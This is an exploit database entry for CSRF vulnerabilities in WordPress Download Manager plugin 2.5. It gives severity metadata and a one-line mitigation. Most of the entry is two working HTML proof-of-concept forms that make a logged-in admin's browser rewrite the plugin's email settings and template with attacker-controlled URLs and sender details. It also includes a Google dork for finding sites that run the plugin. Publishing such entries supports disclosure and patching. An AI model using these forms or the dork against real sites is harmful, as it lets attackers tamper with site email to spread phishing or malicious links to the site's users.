CSRF vulnerabilities in WordPress Download Manager Plugin 2.5

vendor:

WordPress Download Manager

by:

Princy Edward

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: WordPress Download Manager

Affected Version From: 2.5

Affected Version To: 2.5

Patch Exists: YES

Related CWE: N/A

CPE: a:wpdownloadmanager:wordpress_download_manager

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Apache/2.2.24 (CentOS)

2019

CSRF vulnerabilities in WordPress Download Manager Plugin 2.5

There is no CSRF nonce check performed in 'POST /wp-admin/admin-ajax.php?action=wpdm_save_email_setting' and 'POST /wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplate&id=default' requests, allowing an attacker to modify the email template settings and inject malicious content.

Mitigation:

Implementing CSRF nonce checks in the requests.

Source

Exploit-DB raw data:

# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5
# Google Dork: inurl:"/wp-content/plugins/download-manager
# Date: 24 may, 2019
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://www.wpdownloadmanager.com/
# Software Link: https://wordpress.org/plugins/download-manager/
# Tested on: Apache/2.2.24 (CentOS)
POC 

#1 

There is no CSRF nonce check performed in "POST
/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request. 

#Code

<form method="POST"
action="http://localhost/wp-admin/admin-ajax.php?action=wpdm_save_email_setting">
<input type="hidden" name="__wpdm_email_template" value="default.html">
<input type="hidden" name="__wpdm_email_setting[logo]"
value="https://hacker.jpg">
<input type="hidden" name="__wpdm_email_setting[banner]"
value="https://hacker.jpg">
<input type="hidden" name="__wpdm_email_setting[footer_text]"
value="https://malicious-url.com"><input type="hidden" name="__wpdm_email_setting[facebook]"
value="https://malicious-url.com">
<input type="hidden" name="__wpdm_email_setting[twitter]" value="https://malicious-url.com">
<input type="hidden" name="__wpdm_email_setting[youtube]"
value="https://malicious-url.com">
<input type="submit">
</form>

#2

There is no CSRF nonce check performed in "POST
/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat
e&id=default" request.

#Code

<form method="POST"
action="http://localhost/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&
task=EditEmailTemplate&id=default">
<input type="hidden" name="id" value="default">
<input type="hidden" name="email_template[subject]" value="forget password">
<input type="hidden" name="email_template[message]" value="aaa">
<input type="hidden" name="email_template[from_name]" value="hacker">
<input type="hidden" name="email_template[from_email]" value="hacker@hacker.com">
<input type="submit">
</form>